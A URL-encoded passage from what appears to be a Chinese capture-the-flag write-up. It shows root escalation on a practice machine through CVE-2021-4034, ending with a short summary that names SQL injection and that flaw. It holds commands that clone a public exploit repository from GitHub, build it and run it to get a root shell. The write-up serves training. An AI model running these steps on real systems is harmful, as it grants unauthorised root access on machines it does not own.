%E6%B4%9E%EF%BC%8C%E8%80%8C%E4%B8%94%E6%98%AF%E5%8E%BB%E5%B9%B4%E6%89%8D%E6%9B%9D%E5%85%89%E7%9A%84%E6%BC%8F%E6%B4%9E%EF%BC%9A%0A**CVE-2021-4034**%0A**git%20clone%20https%3A%2F%2Fgithub.com%2Fberdav%2FCVE-2021-4034**%0A!%5B2bec1b76dcc1ab4bd71f773ac2269366.png%5D(en-resource%3A%2F%2Fdatabase%2F4295%3A1)%0A%E8%BF%9B%E5%85%A5%20CVE-2021-4034%20%E6%96%87%E4%BB%B6%E5%A4%B9%E7%84%B6%E5%90%8E%E6%89%A7%E8%A1%8C%20make%20%E5%91%BD%E4%BB%A4%0A!%5Baabb1b1be90bf7695291568ff7a7dc7e.png%5D(en-resource%3A%2F%2Fdatabase%2F4297%3A1)%0A%0A%E5%B0%86%E7%94%9F%E6%88%90%20cve-2021-4034%20%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6%EF%BC%8C%E7%9B%B4%E6%8E%A5%E8%BF%90%E8%A1%8C%E5%8D%B3%E5%8F%AF%0A%0A**.%2Fcve-2021-4034**%0A%0A!%5B8c21561bd84b4c89feb63611984f074e.png%5D(en-resource%3A%2F%2Fdatabase%2F4299%3A1)%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E6%88%90%E5%8A%9F%E6%8F%90%E6%9D%83%EF%BC%8C%E6%8B%BF%E5%88%B0%20root%20%E6%9D%83%E9%99%90%EF%BC%8C%E7%8E%B0%E5%9C%A8%E6%89%BEroot%20%E7%9B%AE%E5%BD%95%E4%B8%8B%E7%9A%84%20flag%E5%8D%B3%E5%8F%AF%0A%0A!%5B0a7da7399c8668da10c66ff281d9b138.png%5D(en-resource%3A%2F%2Fdatabase%2F4301%3A1)%0A%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E6%8B%BF%E5%88%B0%E4%BA%86%20flag%2C%20%E8%BF%99%E4%B8%AA%E7%B3%BB%E5%88%97%E9%9D%B6%E6%9C%BA%E6%8C%BA%E6%9C%89%E6%84%8F%E6%80%9D%E7%9A%84%E3%80%82%0A%0A%0A%0A%23%23%23%20%E6%80%BB%E7%BB%93%3A%0A%0A1.%20sql%20%E6%B3%A8%E5%85%A5%0A2.%20cve-2021-4034%0A